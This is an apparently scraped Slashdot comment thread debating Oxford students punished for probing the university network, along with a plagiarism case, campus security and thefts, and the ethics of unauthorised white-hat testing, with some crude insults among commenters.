Just like a driver knows they should stop at the red light, or they shouldn't run people over just because they have a car and can do that, so should a computer user feel when they are presented with a chance to break into someone else's computer or trying to break into a computer.
Only when people drop the *..hacking is learning and discovering...blah blah...* line and accept the true intentions of hacking, will we be able to make real progress in stopping such an act.
I do not know of any hacking act in history that has really helped *...advance our knowledge of computers and security, or helped a company better its system security....* or done any good for that matter, besides cost companies many millions of dollars, take them out of business, cost people jobs and endless frustrations for the VICTIM. Don't try to do something EVIL in the name of GOOD. Do Something GOOD instead....which is: Stay the hell away from my systems...
(strange...my cursor is moving on its own.....?)
The phaomnneil pweor of the hmuan mnid. Fcuknig amzanig eh!
Anyway, on to my point. Two years or so ago, someone came in during regular class hours and managed to steal every single LCD projector on one of the floors of Langstorf Hall and quite a few out of University Hall. These were $5k good projectors that were mounted to the ceiling.
Even though this was during class hours, no one claimed to have seen anything.
Gotta keep up traditions, eh...? I've heard that Sir Tim was thrown off the Oxford network once after hacking it...? Is this true?
Employee of Inrupt, Project Release Manager and Community Manager for Solid
Hey, here is three years worth of speeding tickets, pay up or lose your license. Ok, good, thanks for the cash, btw, give me your licence. I would say he has a point IMHO
Slashdot, where armchair scientists get shouted down and armchair theologians get modded up.
I was in the same boat in my 3rd year of university. I brought my laptop to school, but unfortunately I had left my floppy drive at home and needed to transfer my project from the server to my laptop for the presentation in class. I was in shock to find that all I had to do was plug my laptop into one of the network jacks and I could get an IP and roam the Winblows network freely without a proper account. I didn't bother snooping around because there's nothing interesting to look at. So I proceeded to download my project to the laptop. One of the technicians cleaning up saw my laptop with the network cable attached to it. He stormed over as if someone had just cut off his head.
For my part in "attempting to hack the system" I had a visit with the Dean, and a 2 week ban from the university system. I told the Dean that I thought the University would at least use MAC address filtering..he wasn't amused at my logic because "there are too many computers to manage."
Of course my parents weren't thrilled about it (the University's failure to accept their flaws). My dad insisted on speaking to the Dean but I told him to just drop it and let me finish my degree in peace.
They're said to have historical experience in crucifying the messenger. At least that's what my brother Tomas says - and he's been very active in this business back in the 1470s.
I love C++
God help you if windows blue-screened. What did they do to you then, toss you out for the year?
-Todd
Put down the sig, and step away from the computer.
It's true. The only card key I have to go through is to get into the server room, which is, understandably, higher security.
The only other place I see them is the front doors to dorms, you need a card to enter the building, then once you are in, it's keys.
It makes sense for dorm buildings. What do you do when you kick a student out or one leaves, or loses his keys? Sure maybe you rekey his room, but do you now have to rekey the building too? Issue new keys to everyone?
Now if he loses his ID, you take his old ID off the authorized list, issue him a new ID, and you're done.
Are there more reasons? beats me, I don't work for campus police.
-Steve
"I opened my eyes, and everything went dark again"
The argument could be made that these students were the messenger and that the real fault was that the admins of said network did not apply enough security. You may disagree with this argument. Many here do. However, what the hell makes it offtopic, exactly? I'm not expecting a reply.
It is a miracle that curiosity survives formal education. - Einstein
He might have had a point if they'd actually known that he'd been plagiarising for that long at the time, and if it wasn't absolutely clear to anyone that plagiarism is wrong, and if the guy didn't deserve everything he got (i.e., nothing).
Qualifications get invalidated if you're discovered to have cheated, even after they've been awarded. This is in the interests of everyone except the cheat, for whom I have no sympathy. They got this one just in time.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
One thing that stood out to me in this article...the high security they have on campus. CCTV cameras everywhere? Having to swipe access cards to get in any building, etc...
Cambridge, Oxford and Durham aren't campus universities.
The colleges and departments are spread throughout the city.
Remember when people were going to switch to AMD processors after Intel's prosecution of Randal Schwartz?
That boycott didn't last too long and obviously the system hasn't changed.
You should be prosecuted for kicking somebody in the balls, not telling him his fly is down.
Ten years apart, we have two "fly's down" cases that are referred to the police.
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
I'm always upset with disciplinary action towards white-hat hacking like this. They COULD have just shut up and use the access to their advantage while at the university. Instead, this was for the newspaper and they were essentially informing the network admins of problems.
However, I think it is also important for white-hat hackers to ask permission before attempting any of this stuff. Get in contact with your network officials, you'd be surprised how much they'll let you do.
Now grant it...
I think you mean "granted..."
'Your brain is God.' -- Dr. Timothy Leary
The decision to install the cameras and the locks was made after many thefts of equipment were committed, even in daylight and most of the time without damaging the locks or the doors, which raised suspicions about the integrity of the union workers and the security personnel. It is probably a completely different situation (the fact that crime in México is more widespread than in the UK may be determinant) but it may just be the case.
.I HAVEN'T OWNED A TELEVISION SINCE 1967 AND ONLY WATCH MOVIES ABOUT LEFT-HANDED ALEUT LESBIAN PIPEWELDERS! FUCK HOLLYWOO
We have the same things here at Berkeley. I haven't RTFA, but here we have cameras in the foyers, and access cards for after-hours.
Most buildings are open for the daytime, but you need to swipe in for late night coding sessions.
It makes sense... there's a whole lot of equipment and computers that random people might come in and mess up, and without security...well...
Or maybe that'd just allow the authorities to pull the article before the news got out, and avoid doing any work...
Ceterum censeo subscriptionem esse delendam.
that getting rusticated at Oxford is a bad thing.
WARNING: Smartphones have side effects--most of them undocumented.
Wouldn't that be the lack-of-principles office?
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
These guys are fucktards. If they're lucky, they won't be labeled terrorists and shipped off to federal-pound-me-in-the-ass prison. The current political climate is not one where you can do a pen test without VP or CIO approval and not expect to get the book thrown at you. If you're going to be a whistleblower, the way to do it is via an anonymous letter to the IT dept, then work your way up if they don't fix the problem.
Yes, my only tool is a hammer. And you're starting to look like a nail.
Oh, and who the holy heck are you to say what is the right thing? What hurt did they do (other than to the feelings of some 'tards who are being paid for a job they aren't doing)?
Zero, why did they deal with the issue like a publicity-seeking journo wannabe - surely it would have made more sense to deal with it, I dunno, like it was an issue? Your laughably piss-poor English aside
One, you're not the boss of them.
Two, observe Micro$oft's approach to "being asked like reasonable adults" - it's on The Register and I linked it elsewhere in the thread.
Three, they are publicity-seeking journo wannabes you insensitive clod!!!!!
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
Plagiarism is detected at once or not at all. This smells like BS to me. It is not like it was published in a journal for peer review. If this guy did plagiarize why did the prof take 3 years to figure it out?
Slashdot, where armchair scientists get shouted down and armchair theologians get modded up.
Not necessarily. They detected this time using an automatic checking system, which hadn't been in use previously, IIRC. That detected the cheating, and they then went back over his past work that had previously been accepted, and discovered problems in that as well.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
No the Uni should prosecute them to the fullest extent of the law. They knew exactly what they were doing and that it was wrong. If they wanted to experiment then either take a networking course or build a lan themselves.
As far as "fostering an open environment" goes, if they had, even accidentally, managed to screw up the NFS mount that you had your thesis on (and let's say you aren't exactly technical, say an MBA, so forget backups) you'd be demanding a revival of crucifixion. No-one should be allowed to break the rules without repercussions that should (hopefully) make you think twice about doing it.
Yeah, and most colleges here are right next to streets with crazy drunk kids wandering around and trying to climb the buildings. Sometimes I think there isn't enough security. And the fact that I'm currently typing this on an Oxford University network certainly gives me pause for thought.
Unfortunately the only people more likely to steal than military people is college students.
That, and campus security is often poor, at least where I went to University. Many $5000 projectors were swiped one night for instance. Computer labs would be ripe picking if entrants aren't tracked in some way.
Saskboy's blog is good. 9 out of 10 dentists agree.
Fail their A-levels.
This may not apply at military installations, though.
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
shutting the fuck up, McGonigle. God, I can't wait for my next round of modpoints you dickless bitch.